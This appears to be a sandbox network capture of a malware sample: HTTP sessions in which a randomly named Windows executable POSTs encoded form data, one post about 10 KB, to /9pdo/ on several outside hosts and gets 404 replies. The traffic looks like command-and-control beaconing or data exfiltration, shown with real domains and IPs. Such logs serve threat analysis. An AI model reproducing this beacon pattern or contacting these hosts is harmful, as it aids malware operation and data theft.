                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      X-Redirect-By: WordPress
                                                                      Location: http://n-benriya002.com/9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.44974781.88.63.46801908C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:17:44.740124941 CEST740OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.scwspark.com
                                                                      Origin: http://www.scwspark.com
                                                                      Referer: http://www.scwspark.com/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 54 7a 6a 69 73 69 49 73 43 6f 4a 37 4a 73 39 6a 30 35 45 58 59 35 62 66 37 4d 75 37 58 63 61 53 79 62 46 68 4d 32 34 55 66 64 47 42 33 79 70 6f 45 57 2b 35 55 62 77 4c 52 7a 58 6f 6c 70 39 53 55 72 74 74 4b 6d 69 54 6d 4d 67 78 32 70 35 30 63 47 51 46 37 46 57 36 42 49 61 50 45 30 41 54 39 72 75 57 62 55 79 70 44 6b 54 6a 36 69 59 6f 59 35 56 57 6d 51 34 53 71 4f 73 36 47 62 6a 53 79 2f 61 54 2b 4a 6f 2f 4e 39 73 32 73 4a 6b 39 71 39 39 4d 47 46 32 77 6c 6b 46 76 68 2f 69 2b 6c 68 73 52 6d 70 67 5a 59 4a 5a 51 61 6e 46 51 61 68 52 58 6e 6c 53 79 30 5a 44 56 38 67 6a 38 31 77 3d 3d
                                                                      Data Ascii: edR0hF=TzjisiIsCoJ7Js9j05EXY5bf7Mu7XcaSybFhM24UfdGB3ypoEW+5UbwLRzXolp9SUrttKmiTmMgx2p50cGQF7FW6BIaPE0AT9ruWbUypDkTj6iYoY5VWmQ4SqOs6GbjSy/aT+Jo/N9s2sJk9q99MGF2wlkFvh/i+lhsRmpgZYJZQanFQahRXnlSy0ZDV8gj81w==
                                                                      Apr 16, 2024 17:17:44.952512980 CEST367INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 16 Apr 2024 15:17:44 GMT
                                                                      Server: Apache
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.44974881.88.63.46801908C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:17:47.488965034 CEST760OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.scwspark.com
                                                                      Origin: http://www.scwspark.com
                                                                      Referer: http://www.scwspark.com/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 54 7a 6a 69 73 69 49 73 43 6f 4a 37 62 39 4e 6a 33 66 4d 58 50 4a 62 65 31 73 75 37 59 38 61 65 79 62 4a 68 4d 7a 41 2b 65 76 69 42 79 6a 5a 6f 44 69 4b 35 56 62 77 4c 61 54 58 74 37 5a 39 56 55 72 52 6c 4b 6e 75 54 6d 4d 63 78 32 73 64 30 64 78 4d 61 71 46 57 38 59 59 61 4e 41 30 41 54 39 72 75 57 62 55 6d 51 44 6b 37 6a 36 79 49 6f 5a 59 56 56 76 77 34 54 36 75 73 36 4e 37 6a 57 79 2f 61 6c 2b 4e 6f 5a 4e 2b 55 32 73 49 30 39 72 73 39 50 64 31 33 37 72 45 45 52 6b 63 7a 30 38 7a 45 51 73 72 42 37 48 49 39 67 57 42 55 4b 4c 51 77 41 31 6c 32 42 70 65 4b 68 78 6a 65 31 75 31 75 79 73 38 37 71 76 66 52 38 2b 2f 47 4f 43 72 4b 30 41 54 77 3d
                                                                      Data Ascii: edR0hF=TzjisiIsCoJ7b9Nj3fMXPJbe1su7Y8aeybJhMzA+eviByjZoDiK5VbwLaTXt7Z9VUrRlKnuTmMcx2sd0dxMaqFW8YYaNA0AT9ruWbUmQDk7j6yIoZYVVvw4T6us6N7jWy/al+NoZN+U2sI09rs9Pd137rEERkcz08zEQsrB7HI9gWBUKLQwA1l2BpeKhxje1u1uys87qvfR8+/GOCrK0ATw=
                                                                      Apr 16, 2024 17:17:47.702028036 CEST367INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 16 Apr 2024 15:17:47 GMT
                                                                      Server: Apache
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.44974981.88.63.46801908C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:17:50.239228964 CEST10842OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10303
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.scwspark.com
                                                                      Origin: http://www.scwspark.com
                                                                      Referer: http://www.scwspark.com/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 54 7a 6a 69 73 69 49 73 43 6f 4a 37 62 39 4e 6a 33 66 4d 58 50 4a 62 65 31 73 75 37 59 38 61 65 79 62 4a 68 4d 7a 41 2b 65 76 71 42 79 31 4e 6f 45 7a 4b 35 57 62 77 4c 5a 54 58 73 37 5a 38 51 55 72 35 70 4b 6e 7a 6b 6d 4b 51 78 35 75 56 30 56 6b 34 61 7a 56 57 38 58 34 61 4d 45 30 42 5a 39 72 2f 65 62 55 32 51 44 6b 37 6a 36 30 73 6f 5a 4a 56 56 6a 51 34 53 71 4f 73 32 47 62 6a 71 79 37 4f 31 2b 4e 73 57 4e 76 30 32 76 6f 45 39 6d 2b 6c 50 41 46 33 35 6d 6b 45 5a 6b 63 2f 33 38 7a 5a 70 73 76 49 57 48 4c 68 67 63 48 39 4a 65 30 45 36 68 57 65 61 78 75 65 2b 70 53 79 45 31 32 75 6d 6c 39 58 4d 34 39 64 33 39 63 72 36 56 71 66 33 53 7a 30 35 79 6a 72 57 6f 6e 62 33 78 41 6c 68 61 4d 4d 79 41 65 44 48 64 30 67 7a 64 46 72 75 34 6d 7a 66 4c 39 42 61 70 41 53 36 41 41 6f 73 31 4f 44 63 35 59 33 46 47 65 4a 74 6a 2f 57 50 62 76 62 6c 7a 4a 4f 39 37 6e 4c 58 6e 39 66 78 37 4d 33 58 54 64 30 76 65 6a 39 51 33 54 51 6d 44 71 39 35 62 48 45 55 6c 6e 74 31 6c 56 52 67 53 45 47 71 76 34 57 70 6e 69 72 50 58 69 6b 56 63 6c 55 6d 76 37 48 55 38 4f 6f 47 33 53 6a 38 34 4b 2b 62 54 47 42 67 74 42 34 6c 76 50 4a 5a 70 37 38 4c 63 54 52 57 33 39 75 64 66 78 35 44 57 45 39 34 53 52 5a 65 64 75 72 79 4f 4f 5a 5a 65 35 55 75 59 46 4f 46 7a 6e 6a 45 77 55 46 51 4e 58 32 4b 2f 62 34 66 50 59 50 34 77 48 48 33 58 61 2b 73 48 75 72 61 47 43 6b 35 4e 67 78 4a 54 2f 6a 53 42 6e 6a 68 6a 6c 56 2f 2b 56 2b 7a 44 6d 36 36 51 63 7a 37 71 34 4e 73 58 31 78 65 45 35 44 6f 2b 34 69 51 66 76 65 35 58 34 74 6e 33 62 57 69 73 4c 74 37 6e 4d 4b 4c 73 55 36 66 33 58 64 56 58 69 75 64 44 32 59 57 51 7a 46 4c 30 2b 79 76 30 68 66 75 66 31 37 2f 48 5a 61 50 71 41 73 31 44 75 49 75 64 7a 37 74 62 42 58 6e 32 35 65 46 6e 51 39 6c 43 73 66 48 56 33 31 51 48 44 48 64 69 5a 44 56 57 62 51 55 4b 64 37 6a 5a 79 6c 6f 67 64 72 4c 6a 4b 62 35 66 78 57 46 77 51 52 66 6e 6b 52 61 4d 4f 59 43 34 62 77 56 6d 6c 56 39 73 6f 53 35 4d 41 53 54 75 4e 54 46 46 39 55 32 6b 2f 59 76 78 6c 46 62 50 4f 43 2b 57 46 4e 31 6d 54 4e 69 53 65 57 63 69 79 67 58 66 56 41 4b 45 47 66 53 73 6b 4a 6d 4e 64 36 53 63 43 4d 31 74 39 56 74 72 4b 38 74 4d 67 71 4d 6a 74 4d 71 4a 2f 39 66 35 67 46 64 76 45 71 68 32 68 2b 77 47 77 56 31 44 59 64 39 32 63 64 62 74 4b 2b 47 51 30 42 4a 69 52 42 6a 37 4f 49 41 32 68 71 65 66 6a 55 6b 52 67 77 2f 43 6a 4a 62 4e 4c 35 61 37 39 43 4b 4b 58 71 38 62 71 46 36 4e 62 49 36 75 6e 52 43 5a 43 35 51 4a 74 73 44 54 2b 75 30 7a 4d 42 4e 58 65 30 34 2b 76 35 36 75 65 54 70 79 55 75 64 61 47 6f 31 41 6d 51 2b 34 71 2b 45 73 6b 77 71 75 4d 77 36 48 4d 75 73 73 78 37 4e 51 62 72 74 34 35 6c 6c 32 35 71 70 67 42 6a 6e 4f 4d 72 61 66 2b 5a 48 66 65 34 4b 75 74 74 73 47 52 37 77 42 57 6e 39 58 48 75 61 78 64 72 50 57 44 6f 6f 66 35 4a 4a 6b 33 64 73 4c 63 4d 69 74 76 63 78 52 74 43 50 62 33 48 74 31 2b 50 57 61 42 64 72 68 41 4a 44 6a 2b 4d 49 65 4c 47 38 5a 70 54 4e 32 49 4b 6d 6b 52 6c 52 67 47 4b 45 41 57 37 77 52 6e 4f 4f 77 6c 59 71 72 77 4f 37 34 48 75 32 56 6e 4f 4e 73 4e 46 45 7a 67 38 34 71 52 65 49 6a 69 65 75 6e 76 79 4b 58 74 6c 46 44 6f 6a 2b 58 36 4a 57 72 62 67 46 4d 7a 53 33 59 53 39 6d 4f 53 4f 50 4d 57 46 4c 2b 61 62 2f 68 6d 7a 4a 6b 6c 45 43 57 36 49 6d 55 79 34 65 6d 73 43 79 38 45 50 33 6c 50 50 50 74 42 4c 4e 31 35 33 78 31 67 70 6c 4e 6d 45 79 73 6e 64 4a 59 69 35 4d 46 41 73 6e 77 61 34 56 51 65 63 66 32 53 6c 6f 2b 48 45 64 42 53 6c 67 2f 5a 74 70 6b 50 6a 78 70 35 2b 52 46 30 73 49 4e 70 69 4c 35 49 47 6d 69 34 4f 52 48 6d 4f 4a 45 74 62 6e 43 39 6a 64 47 57 77 44 71 46 51 38 63 6e 44 45 37 65 61 78 45 75 72 72 69 72 4b 76 2f 36 64 4f 78 6c 4c 51 49 33 68 6c 70 6f 79 6a 35 37 74 61 76 48 68 32 59 44 6b 51 4e 4c 64 4a 4b 31 48 6f 44 46 62 67 42 74 4c 79 69 46 59 74 48 50 53 46 76 39 30 47 78 38 34 57 44 68 4c 4e 41 4d 76 4a 78 73 73 78 47 78 30 57 66 43 6e 43 74 2f 76 6b 79 2f 7a 68 63 4b 53 43 76 41 70 55 68 55 74 78 70 6e 37 4a 79 30 46 49 78 68 4f 56 6c 58 46 62 4b 48 70 52 6a 32 55 6c 6b 34 53 7a 6b 35 33 76 32 57 65 67 71 31 78 39 41 78 5a 7a 41 6a 31 59 48 79 56 76 57 61 58 43 38 31 6d 6d 4b 37 51 75 31 44 51 39
                                                                      Data Ascii: edR0hF=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
                                                                      Apr 16, 2024 17:17:50.453140020 CEST367INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 16 Apr 2024 15:17:50 GMT
                                                                      Server: Apache
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.44975081.88.63.46801908C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:17:52.988706112 CEST472OUTGET /9pdo/?edR0hF=exLCvVI2E5RJM8xtzs4Hapiqzu/uGv/f+6d2cWgRCMmdoFVcUWazUq40e3zK6s54E+NAVH76kqhd1uh4f2sEtFmHSsWrMW9P35+QXkOmQzbQkkc9XIR6mDA=&jzuh=7Bfls2 HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      Host: www.scwspark.com
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Apr 16, 2024 17:17:53.201888084 CEST367INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 16 Apr 2024 15:17:53 GMT
                                                                      Server: Apache
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.44975166.29.135.159801908C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:17:58.706362963 CEST758OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.eternalsunrise.xyz
                                                                      Origin: http://www.eternalsunrise.xyz
                                                                      Referer: http://www.eternalsunrise.xyz/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 79 74 36 53 4d 41 6e 55 4d 6d 6b 4e 4a 59 49 37 34 6d 54 72 6d 6e 5a 55 63 2f 6d 75 75 75 50 42 59 79 48 4a 6f 6c 57 63 4e 61 4a 51 48 64 55 65 79 39 4e 52 74 47 72 49 4c 71 2b 51 44 75 6e 57 41 64 51 2f 32 37 33 74 58 34 78 6f 30 47 75 71 6a 4c 49 35 65 61 68 6e 76 53 4a 68 62 63 44 67 62 61 36 62 6d 31 47 41 75 41 50 4c 49 43 58 77 46 30 34 79 41 6f 67 47 50 59 33 36 36 77 59 6e 58 47 66 73 76 48 49 2b 6a 6b 4e 68 69 49 74 39 4a 4a 46 5a 51 47 79 57 4a 70 7a 47 6d 51 73 44 30 6a 66 79 76 68 65 5a 30 79 51 79 32 75 4f 52 35 61 37 53 48 79 6a 56 48 36 58 65 4d 63 4e 4f 2b 41 3d 3d
                                                                      Data Ascii: edR0hF=yt6SMAnUMmkNJYI74mTrmnZUc/muuuPBYyHJolWcNaJQHdUey9NRtGrILq+QDunWAdQ/273tX4xo0GuqjLI5eahnvSJhbcDgba6bm1GAuAPLICXwF04yAogGPY366wYnXGfsvHI+jkNhiIt9JJFZQGyWJpzGmQsD0jfyvheZ0yQy2uOR5a7SHyjVH6XeMcNO+A==
                                                                      Apr 16, 2024 17:17:58.903675079 CEST533INHTTP/1.1 404 Not Found
